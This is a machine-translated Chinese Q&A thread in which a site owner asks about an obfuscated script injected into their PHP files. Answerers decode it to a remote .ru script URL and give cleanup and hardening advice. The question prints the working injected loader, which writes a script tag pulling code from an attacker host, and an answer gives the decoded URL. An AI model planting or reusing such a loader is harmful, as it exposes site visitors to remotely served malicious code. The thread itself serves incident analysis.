2010-02-06 60 views
1

我在我的网站的PHP文件中找到了以下代码。我认为有人只是能够破解我的ftp或者用他能够在我的PHP文件中添加这个脚本的方式,却不知道如何。Iframe在PHP文件中的恶意代码?

<script>/*Exception*/ document.write('<script src='+'h&)t()#[email protected]$^p^^(:&#/&/!)[email protected]&o&&[email protected]@)!o)[email protected]$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#[email protected]))$t)#[email protected]&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^[email protected]#n([email protected]@!$)l!)#o&$([email protected])s)@&$.&^r(u()&:!)8([email protected]@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^([email protected]@[email protected]!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)[email protected](#t#$.(d^e(!#/&!^e)a!^()r&)t^@[email protected]@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&[email protected]&$l&^d#o!&&#[email protected]()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@[email protected]@m#&^/[email protected]&#o(^o^&(!&[email protected]#e^!&&.(c^o#[email protected]#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script> 
<!--5f81e446ddf4e34599fb494b668c1569--> 

但我想知道以上代码的意思,我想这在HTML格式或以其他形式进行了加密,但什么上面的代码实际上是在做和如何有人能在我的网站上把它注射??

谢谢。

回答

2

上述脚本SRC导致地址http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/

它钻进你的文件或者通过在你的网站/脚本安全漏洞或直接通过FTP。

请务必尽快从这些恶意代码清除您的文件,更改您的ftp密码并修复您的安全漏洞!

+0

我可以轻而易举地完成前两件事,但是“解决您的安全缺陷”是什么类型的错误,我看着我的代码。这些代码可以被注入的可能方式有哪些?因为他们如何能够直接从我的网站写入我的文件? – Prashant 2010-02-06 21:39:00

+1

@Prashant这听起来像你基本上需要阅读网络安全。有人可能攻击你的服务器和更改文件的方式非常多。它可能是通过你的PHP代码,它可能是通过你的网络服务器(或邮件服务器等)的利用,它甚至可以通过你的开发系统上的间谍软件获得你的密码。你正在运行你自己的服务器,还是你在托管/共享托管?你是否在使用类似Wordpress或Web框架的东西?您是否使用FTP(以明文形式发送密码)或sftp? – JAL 2010-02-06 21:47:20

+2

如果您运行任何应用程序(如论坛或图库),请尝试升级到最新版本。这些应用程序通常具有安全漏洞,因为这些源是公开可用的,所以很容易找到并利用它们。 – Alex 2010-02-06 21:48:17

0

我不认为它做任何事情。它具有相同的URL Alex posted,所以我不打算在此重复。

当我试图用curl与IE6的用户代理头获取它,记录头到一个文件,我得到了这些标题:

HTTP/1.1 200 OK 
Server: nginx 
Date: Sat, 06 Feb 2010 21:37:13 GMT 
Content-Type: text/javascript 
Connection: close 
X-Powered-By: PHP/5.1.6 
Expires: 0 
Pragma: no-cache 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Cache-Control: private 
Content-Length: 2 

此外,该文件的内容似乎只是一个CRLF 。没什么特别的。

我不知道他们为什么把它放在那里,但也许曾经有过恶意的东西,但现在没有......或者他们只是在等待一些时间来放置一些恶意代码。